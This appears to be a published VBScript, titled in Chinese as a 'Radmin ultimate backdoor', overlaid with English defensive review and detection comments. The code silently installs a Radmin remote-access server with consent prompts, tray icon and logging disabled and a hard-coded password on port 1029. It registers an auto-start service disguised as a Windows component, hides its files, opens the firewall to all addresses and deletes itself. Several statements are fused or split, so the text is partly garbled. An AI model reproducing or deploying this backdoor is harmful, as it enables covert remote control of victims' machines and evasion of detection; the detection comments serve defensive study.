Vbs脚本实现radmin终极后门
Vbs脚本实现radmin终极后门
Vbs脚本实现radmin终极后门
' Review note (defensive reading): this part of the listing builds the
' registry configuration of a Radmin server through the WMI StdRegProv
' registry provider on the local machine (strComputer = ".").
' NOTE(review): in this copy several statements are fused onto one line and
' some assignments are split after "Return ="; the text is kept as published
' and is not valid VBScript as it stands.
' "on error resume next" suppresses every runtime error, so a failed step
' produces no message.
on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_ strComputer & "\root\default:StdRegProv")
' Creates the key chain HKLM\SYSTEM\RAdmin\v2.0\Server plus its iplist and
' Parameters subkeys, one level at a time.
' Detection: alert on creation of HKLM\SYSTEM\RAdmin on hosts where Radmin
' is not a sanctioned tool. Writes made through StdRegProv are typically
' attributed to the WMI provider host rather than to the script host, so
' hunt on the key path, not on the writing process.
strKeyPath = "SYSTEM\RAdmin"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\iplist"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
' Values written under ...\Server\Parameters, each as a 4-byte binary value.
' The meanings below are inferred from the value names only; confirm them
' against Radmin documentation:
'   AskUser = 0, AutoAllow = 0  - presumably no consent prompt is shown
'   DisableTrayIcon = 1         - presumably hides the tray icon
'   EnableEventLog = 0          - presumably no event-log entries are written
' Detection: a hidden tray icon combined with logging switched off is the
' pattern to flag when auditing this key.
Set objRegistry = GetObject("Winmgmts:root\default:StdRegProv") strPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
uBinary = Array(0,0,0,0)
Return =
objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary) uBinary = Array(0,0,0,0)
Return =
objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary) uBinary = Array(1,0,0,0)
Return =
objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary) uBinary = Array(0,0,0,0)
Return =
objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)
uBinary = Array(0,0,0,0)
' Continues the ...\Server\Parameters values (the uBinary used for
' EnableLogFile is assigned on the preceding line):
'   EnableLogFile = 0, FilterIp = 0, NTAuthEnabled = 0
' Inferred from the names only (confirm against Radmin documentation): file
' logging off, no source-IP filter, Windows (NT) authentication off.
' The 16-byte array that ends this run is, per the author's trailing note,
' a registry export converted from hexadecimal to decimal; it is written to
' the "Parameter" value further down the listing. It depends on the chosen
' password, so treat it as an indicator for this exact listing only.
Return =
objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary) uBinary = Array(0,0,0,0)
Return =
objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary) uBinary = Array(0,0,0,0)
Return =
objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary) uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119) //此为注册
表
' The first line below is the tail of the author's note on the 16-byte array
' assigned just before it ("registry export, hex converted to decimal",
' followed by the password the author used).
导出十六进制转为十进制数据 pass:241241241
' "Parameter" receives that 16-byte value; the author's note labels it the
' Radmin password.
Return =
objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary)
//Radmin密码
' "Port" = bytes 5,4,0,0, i.e. 0x0405 read little-endian = 1029, matching
' the author's note. "Timeout" = 10 (unit not shown here).
' Detection: an unexpected listener on port 1029 (presumably TCP) owned by a
' process in system32 is worth correlating with the registry key above it.
uBinary = Array(5,4,0,0) //端口:1029
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary) uBinary = Array(10,0,0,0)
Return =
objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary) Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv")
' Sets LogFilePath to c:\logfile.txt, although EnableLogFile was written as 0
' earlier in the listing.
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
strValueName = "LogFilePath"
strValue = "c:\logfile.txt"
' Persistence: sc.exe registers an auto-start service named WinManageHelp
' whose binary is %systemroot%\system32\Exporer.exe, a file name one letter
' away from explorer.exe. The second argument 0 to Run hides the window.
' Detection: service-installation events for WinManageHelp (for example
' Event ID 7045 in the System log on systems that record it) and any
' service whose image path points at Exporer.exe.
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%\system32\Exporer.exe start= auto",0)
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv")
' Description, DisplayName and ImagePath are then written directly under
' ControlSet001 (not CurrentControlSet), using text that imitates a Windows
' component name. Forensics: compare the service's display name with its
' image path; here the display name suggests WMI while the binary is
' Exporer.exe started with /service.
strKeyPath = "SYSTEM\ControlSet001\Services\WinManageHelp"
strValueName = "Description"
strValue = "Windows Media PlayerWindows Management Instrumentation Player
Drivers."
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue strValueName = "DisplayName"
strValue = "Windows Management Instrumentation Player Drivers" oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue strValueName = "ImagePath"
strValue = "c:\windows\system32\Exporer.exe /service"
oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
set wshshell=createobject ("wscript.shell")
' Starts the WinManageHelp service, then marks exporer.exe, AdmDll.dll and
' raddrv.dll in system32 read-only + hidden + system (attrib +r +h +s), so
' they are absent from a default directory listing.
' Triage: enumerate system32 with hidden and system files included and look
' for these three names together.
a=wshshell.run ("net start WinManageHelp",0)
b=wshshell.run ("attrib +r +h +s %systemroot%\system32\exporer.exe",0) c=wshshell.run ("attrib +r +h +s %systemroot%\system32\AdmDll.dll",0) d=wshshell.run ("attrib +r +h +s %systemroot%\system32\raddrv.dll",0) on error resume next //以下代码为穿透MS防火墙代码
' Firewall: through HNetCfg.FwMgr the script adds an authorized-application
' entry named "Radmin3.0" for the same binary to the local policy profile of
' type 1 (the standard profile in the HNetCfg API), with IPVersion 2 (any),
' Scope 0 (all) and RemoteAddresses "*", i.e. reachable from any address.
' Detection: audit the Windows Firewall authorized-applications list for an
' entry whose image path is %systemroot%\system32\exporer.exe.
Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy
Set objProfile = objPolicy.GetProfileByType(1)
Set objApplication = CreateObject("HNetCfg.FwAuthorizedApplication") objApplication.Name = "Radmin3.0"
objApplication.IPVersion = 2
objApplication.ProcessImageFileName = "%systemroot%\system32\exporer.exe" objApplication.RemoteAddresses = "*"
objApplication.Scope = 0
objApplication.Enabled = True
Set colApplications = objProfile.AuthorizedApplications
colApplications.Add(objApplication)
' The last statement deletes the script file itself (the author's note reads
' "self-delete"). Forensics: the .vbs will often be gone, so rely on the
' registry, service and firewall artifacts it leaves behind; because errors
' are suppressed a failed delete is silent, so still search for the file.
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) //自删除